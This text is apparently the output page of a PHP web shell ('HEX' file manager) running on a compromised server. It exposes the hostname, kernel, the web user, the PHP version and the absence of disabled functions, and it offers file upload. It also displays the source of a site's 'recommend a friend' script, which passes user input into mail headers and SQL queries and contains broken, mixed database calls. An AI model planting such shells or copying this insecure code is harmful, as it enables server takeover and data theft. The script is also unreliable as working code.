( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
$ pwd: /var/www/html/
Upload Files
File: /var/www/html/recommend.php
<?php
function filter($arr) {
    global $link;
return array_map(array($link, 'real_escape_string'), $arr);
}

$_GET = filter($_GET);
$_POST = filter($_POST);
$mode=$_GET["mode"];
include("protect.php");
if (empty($page)) {
	$page = 0;
}
include("includes/limittext.php");
include('Connections/videoondemand.php');
require("DbSql2.inc.php");
require("NewsSql2.inc.php");
$db = new NewsSQL();


page_protect();

if(count($_POST)) {
# This part strips out nasty code that a malicious
# person may try to inject into the form

foreach(array('fmail1','fmail2','fmail3','email','name') as $key) $_POST[$key] = strip_tags($_POST[$key]);
if(!is_secure($_POST)) { die("Hackers begone");}

# This part submits a notification to you when 
# the form is submitted

// Email address for copies to be sent to - change to suit
$emailto = "info@eziki.tv"; 

// Notification email subject text for copies
$esubject = "Recommendation submitted"; 

// Email body text for notifications
$emailtext = "
$_POST[name] $_POST[email] has sent a recommendation 
shared to:

$_POST[fmail1]
$_POST[fmail2]
$_POST[fmail3]

The page recommended:

$_POST[refurl]

";

# This function sends the email to you

@mail("$emailto", $esubject, $emailtext, "From: $_POST[email]");

# This part is the function for sending to recipients

// Page to display after successful submission
// Change the thankyou.htm to suit
$msg = urlencode("Thank you. Successfully Invited Friends");
$thankyoupage = "index.php?msg=$msg"; 

// Subject line for the recommendation - change to suit

$tsubject = "$_POST[name] Invites you to Eziki ";

// Change the text below for the email 
// Be careful not to change anyt "$_POST[value]" bits

$ttext = "
Hey,

$_POST[name], email address $_POST[email] thought you may be interested in Eziki. 

$_POST[refurl]

Eziki is a social platform to explore, experience and enjoy great music,videos and photos .

$_POST[name] has used Eziki and has sent you this note.

We look forward to seeing you there!

";
 
# This sends the note to the addresses submitted
@mail("$_POST[fmail1],$_POST[fmail2],$_POST[fmail3]", $tsubject, $ttext, "FROM: $_POST[email]");


$catalogid = $_SESSION['euserid']; 
$duplicate = mysqli_query("select count(*) as total from contacts where catalogid='$catalogid' and email='$_POST[fmail1]'  ") or die(mysql_error());
		
		list($total) = mysql_fetch_row($duplicate);
		
		if ($total == 0)
		{
			
$sql = "INSERT into `contacts` (`catalogid`,`email`,`source`,`status`,`appno`,`type`) VALUES ('$catalogid','$_POST[fmail1]','email','0','$_POST[appno]','invite')";
mysqli_query($sql,$link) ;		
		}




if(!empty($_POST["fmail2"])){ 

$duplicate = mysqli_query("select count(*) as total from contacts where catalogid='$catalogid' and email='$_POST[fmail2]'  ") or die(mysql_error());
		
		list($total) = mysql_fetch_row($duplicate);
		
		if ($total == 0)
		{
			
$sql = "INSERT into `contacts` (`catalogid`,`email`,`source`,`status`,`appno`,`type`) VALUES ('$catalogid','$_POST[fmail2]','email','0','$_POST[appno]','invite')";
mysqli_query($sql,$link) ;	
		}




}

if(!empty($_POST["fmail3"])){ 

$duplicate = mysqli_query("select count(*) as total from contacts where catalogid='$catalogid' and email='$_POST[fmail3]'  ") or die(mysql_error());
		
		list($total) = mysql_fetch_row($duplicate);
		
		if ($total == 0)
		{
			
$sql = "INSERT into `contacts` (`catalogid`,`email`,`source`,`status`,`appno`,`type`) VALUES ('$catalogid','$_POST[fmail3]','email','0','$_POST[appno]','invite')";
mysqli_query($sql,$link) ;		
		}




}





# After submission, the thank you page
header("Location: $thankyoupage");
exit;

}

# Nothing further can be changed. Leave the below as is

function is_secure($ar) {
$reg = "/(Content-Type|Bcc|MIME-Version|Content-Transfer-Encoding)/i";
if(!is_array($ar)) { return preg_match($reg,$ar);}
$incoming = array_values_recursive($ar);
foreach($incoming as $k=>$v) if(preg_match($reg,$v)) return false;
return true;
}

function array_values_recursive($array) {
$arrayValues = array();
foreach ($array as $key=>$value) {
if (is_scalar($value) || is_resource($value)) {
$arrayValues[] = $value;
$arrayValues[] = $key;
}
elseif (is_array($value)) {
$arrayValues[] = $key;
$arrayValues = array_merge($arrayValues, array_values_recursive($value));
}
}
return $arrayValues;
}

?>
@ Telegram